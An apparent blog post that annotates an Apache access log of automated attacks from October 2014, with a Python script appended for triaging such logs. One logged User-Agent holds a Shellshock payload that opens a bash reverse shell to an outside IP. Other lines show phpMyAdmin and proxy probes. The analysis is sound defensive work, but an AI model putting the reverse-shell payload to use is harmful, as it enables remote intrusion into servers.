A few more curiosities from the logs of an Apache 2 server
There are clearly attempts by automated scripts looking for vulnerabilities related to PhpMyAdmin (in yellow) and a Shellshock-based attack (in red), made in the hope of finding CPanel installed.
More curious are the lines in green, where requests are made to services such as proxyjudge, which check the status of proxy servers (perhaps a way to check whether the machine is behind a proxy???)
In any case, as can be seen, the server's responses are in the 400 class, so the file was not found.
Also interesting is the line in light blue, which contains a request that does not appear to belong to the HTTP protocol.
Finally, the countries of origin of the attacks: in some cases Taiwan, in others Thailand,
08.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /ujuj/uju/uj.php HTTP/1.1" 404 470 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
207.240.10.33 - - [29/Oct/2014:23:29:50 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 487 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
85.25.72.86 - - [29/Oct/2014:23:30:56 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 0 "-" "-"
125.64.35.67 - - [30/Oct/2014:00:03:13 +0000] "GET http://6.url.cn/zc/chs/img/body.png HTTP/1.1" 404 450 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.3072; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0)"
61.58.204.97 - - [30/Oct/2014:00:42:07 +0000] "GET /hghg/hgh/hg.php HTTP/1.1" 404 470 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:08 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:09 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:10 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:50 +0000] "GET /kkkk/kkk/kk.php HTTP/1.1" 404 470 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:51 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:52 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:52 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
1.164.41.53 - - [30/Oct/2014:01:45:02 +0000] "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 405 537 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:29 +0000] "GET /asas/asa/as.php HTTP/1.1" 404 470 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
64.4.97.21 - - [30/Oct/2014:06:37:26 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"
218.59.238.93 - - [30/Oct/2014:11:01:52 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [30/Oct/2014:11:02:14 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
124.122.165.64 - - [30/Oct/2014:08:53:09 +0000] "GET /vyvy/vyv/vy.php HTTP/1.1" 404 470 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:12 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
218.59.238.93 - - [29/Oct/2014:16:19:29 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:16:19:44 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:10:07:33 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:10:39:54 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:11:12:40 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:11:13:49 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
221.165.35.130 - - [27/Oct/2014:23:25:57 +0000] "GET / HTTP/1.1" 200 11820 "-" "-"
65.99.238.246 - - [27/Oct/2014:23:43:43 +0000] "GET / HTTP/1.0" 200 11783 "-" "-"
218.59.238.93 - - [27/Oct/2014:23:46:01 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:00:48:51 +0000] "GET http://yazoodle.net/azenv.php HTTP/1.0" 404 463 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:00:57:38 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
61.19.199.74 - - [28/Oct/2014:01:05:10 +0000] "GET /zyzy/zyz/zy.php HTTP/1.1" 404 470 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:11 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
218.59.238.93 - - [28/Oct/2014:01:36:04 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:01:49:47 +0000] "GET http://www.mesregies.com/azz.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:02:50:52 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:03:51:04 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
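One way to triage a log like the one above automatically (an added example, not part of the original post): it labels each line as a phpMyAdmin setup probe, a Shellshock attempt or a proxy check, and lists any such request that received a 2xx answer. The labels, the function names and the regular expressions are assumptions of this example; the sample lines are copied from the log above.

```python
import re
from collections import Counter

# Apache "combined" log format; assumes no escaped quotes inside the quoted fields.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
PMA_RE = re.compile(r'^/(phpmyadmin|pma|myadmin)/scripts/setup\.php', re.I)

def classify(line):
    """Return (ip, label, status) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    method, _, rest = m["req"].partition(" ")
    target = rest.split(" ")[0] if rest else ""
    if any("() {" in m[f] for f in ("req", "ref", "ua")):
        label = "shellshock"        # bash function-definition prefix in a request field
    elif method == "CONNECT" or target.lower().startswith(("http://", "https://")):
        label = "proxy-check"       # proxy-style request sent to a plain web server
    elif PMA_RE.match(target):
        label = "phpmyadmin-probe"
    else:
        label = "other"
    return m["ip"], label, int(m["status"])

def summarize(lines):
    """Count labels and list every non-'other' hit that was answered with 2xx."""
    counts, answered = Counter(), []
    for rec in filter(None, map(classify, lines)):
        counts[rec[1]] += 1
        if rec[1] != "other" and 200 <= rec[2] < 300:
            answered.append(rec)
    return counts, answered

# Sample lines copied from the log above.
SAMPLE = [
    '108.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"',
    '207.240.10.33 - - [29/Oct/2014:23:29:50 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 487 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"',
    '1.164.41.53 - - [30/Oct/2014:01:45:02 +0000] "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 405 537 "-" "-"',
    '218.59.238.93 - - [29/Oct/2014:16:19:44 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"',
    '65.99.238.246 - - [27/Oct/2014:23:43:43 +0000] "GET / HTTP/1.0" 200 11783 "-" "-"',
]

if __name__ == "__main__":
    counts, answered = summarize(SAMPLE)
    print(dict(counts), "review:", answered)
```

The one request flagged for review, `GET http://proxyjudge.us/` with status 200, has the same response size (11783 bytes) as the plain `GET /` in the log, which is consistent with the server returning its own front page rather than relaying the request.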